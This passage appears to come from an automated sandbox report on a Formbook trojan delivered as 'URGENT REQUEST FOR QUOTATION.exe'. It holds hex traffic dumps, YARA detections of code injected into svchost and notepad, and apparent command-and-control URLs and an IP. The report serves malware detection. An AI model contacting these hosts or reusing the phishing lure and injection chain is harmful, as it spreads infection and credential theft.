86 e7 bf 8d 19 fa 8f e7 fd 13 e8 fc b4 fc eb 5f fe 5f 38 8e ff bd a3 7d b1 81 4e ff 75 9d 93 ec 6f 93 f7 9f 97 fe 6d da fe 25 2f d6 ec 3f 1e f3 5f 27 81 fa 8f c6 fc e7 fd 68 9a fe fb fd b6 e2 da fe fa b7 61 fd ef 03 da 83 49 fa eb 3f 46 f5 3f 5b f9 f7 87 94 d3 04 da f0 1f 8f 81 ff c7 5f e6 69 05 cb f6 cf 5c 25 e9 0a 66 6b 2b fe d1 d6 12 ac 9b ff 58 81 e9 b4 6d d3 f0 af 7f c1 b1 7f b4 e5 7f 8f ee ff f5 3f ff f2 3f e0 ff b2 6c ff 7f c7 e6 ff a9 91 ff b5 8b ff b8 ed 7f 6b e2 bf a4 1b e8 48 f7 1f 4d fd c7 60 62 48 42 e2 c9 7f e9 7f 5e 64 d3 92 fc bd 0b e3 34 fe bd f9 7f 6e f4 6f f0 3f 76 d6 bf c1 ff b1 e3 ff ed cf ca ff db f6 ce 9b e3 2f 59 9f ac eb bf ff f3 7f 2e eb 7f fe db 26 fc af 6f fd 59 2c 7f 7f f5 9f fe ed cf 9a 5b 97 ec df ff 39 4f b6 e4 5f 9b 21 a9 0a 78 1e ab ff 99 26 6b 41 11 ff 77 13 f2 96 7b 22 2f a5 9a 38 f0 65 7a 41 2d 05 15 f8 cd 3b c1 37 49 14 b8 18 fc 14 ec fa 19 a2 3f 17 f0 aa 29 78 a1 a3 09 5c a5 95 5c dd 35 7f 5e e4 fa d3 93 fb 07 fc b2 41 e0 63 ef 72 e5 61 2d 7f 91 7f 6e c1 5f 88 1b d6 48 80 b1 43 ae e6 75 36 04 9c 13 b9 47 3c 04 95 3b f4 f7 f7 93 1f d9 b0 3d 9a 64 fa e6 de 30 eb 04 3e 24 80 c7 07 2e 1f aa 4d 46 eb 28 5e f0 6e 28 33 69 69 3c 76 8a d4 e6 8b 02 0f 0f 03 41 60 75 dd 91 03 57 76 1d 29 fd b8 92 f9 0d 64 a1 26 82 d8 d1 d5 9b 8b b5 ea 02 ff bc 45 75 b8 b5 f3 ac c9 2f 7e b0 e3 39 e3 92 1b a3 05 db f7 77 12 8c 71 a7 95 f8 23 c0 1b 3d b6 67 6d 60 e5 fe 79 27 d9 5e 44 19 7b f1 ad c8 1
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 19:01:42 GMTContent-Type: text/htmlContent-Length: 58288Connection: closeVary: Accept-EncodingETag: "66a0c828-e3b0"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 19:01:57 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 19:02:00 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 19:02:02 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 19:02:05 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: notepad.exe, 00000006.00000002.4130391348.0000000005A8A000.00000004.10000000.00040000.00000000.sdmp, iadfuWOlEqeEML.exe, 00000008.00000002.4130063768.000000000362A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://156.226.108.99:28888/
            Source: iadfuWOlEqeEML.exe, 00000008.00000002.4131591003.000000000521E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.technew.shop
            Source: iadfuWOlEqeEML.exe, 00000008.00000002.4131591003.000000000521E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.technew.shop/cqvc/
            Source: notepad.exe, 00000006.00000003.2318881109.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: notepad.exe, 00000006.00000003.2318881109.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: notepad.exe, 00000006.00000003.2318881109.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: notepad.exe, 00000006.00000003.2318881109.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: notepad.exe, 00000006.00000003.2318881109.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: notepad.exe, 00000006.00000003.2318881109.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: notepad.exe, 00000006.00000003.2318881109.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: notepad.exe, 00000006.00000002.4130391348.00000000060D2000.00000004.10000000.00040000.00000000.sdmp, iadfuWOlEqeEML.exe, 00000008.00000002.4130063768.0000000003C72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
            Source: notepad.exe, 00000006.00000002.4129028971.0000000002FF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: notepad.exe, 00000006.00000002.4129028971.0000000002FF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: notepad.exe, 00000006.00000002.4129028971.0000000002FF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: notepad.exe, 00000006.00000002.4129028971.0000000002FF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: notepad.exe, 00000006.00000002.4129028971.0000000002FF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: notepad.exe, 00000006.00000002.4129028971.0000000002FF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: notepad.exe, 00000006.00000003.2312281414.0000000007BFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: notepad.exe, 00000006.00000002.4130391348.00000000068AC000.00000004.10000000.00040000.00000000.sdmp, iadfuWOlEqeEML.exe, 00000008.00000002.4130063768.000000000444C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.aapanel.com/new/download.html?invite_code=aapanele
            Source: notepad.exe, 00000006.00000002.4130391348.00000000063F6000.00000004.10000000.00040000.00000000.sdmp, iadfuWOlEqeEML.exe, 00000008.00000002.4130063768.0000000003F96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bayarcepat19.click/5hcm/?InQ=tP3kAkfnE7i1YCC4WEIWdKvNUvpS22y5K3aSOloco8KmCG1xGxL66P/sVWp
            Source: notepad.exe, 00000006.00000003.2318881109.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: notepad.exe, 00000006.00000003.2318881109.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000AEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_000AEAFF
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000AED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_000AED6A
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000AEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_000AEAFF
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_0009AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0009AA57
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000C9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_000C9576

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.4129751866.0000000003670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4131591003.00000000051C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2075405334.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4128947956.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4128861229.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2075121033.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4128488023.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2075735813.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4129751866.0000000003670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4131591003.00000000051C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2075405334.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4128947956.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4128861229.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2075121033.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4128488023.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2075735813.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: URGENT REQUEST FOR QUOTATION.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: URGENT REQUEST FOR QUOTATION.exe, 00000000.00000000.1659968849.00000000000F2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f546f81d-1
            Source: URGENT REQUEST FOR QUOTATION.exe, 00000000.00000000.1659968849.00000000000F2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_29a2ad78-1
            Source: URGENT REQUEST FOR QUOTATION.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_46f98b2b-8
            Source: URGENT REQUEST FOR QUOTATION.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_9c460ad7-6
            Source: initial sampleStatic PE information: Filename: URGENT REQUEST FOR QUOTATION.exe
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C753 NtClose,1_2_0042C753
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172B60 NtClose,LdrInitializeThunk,1_2_03172B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03172DF0
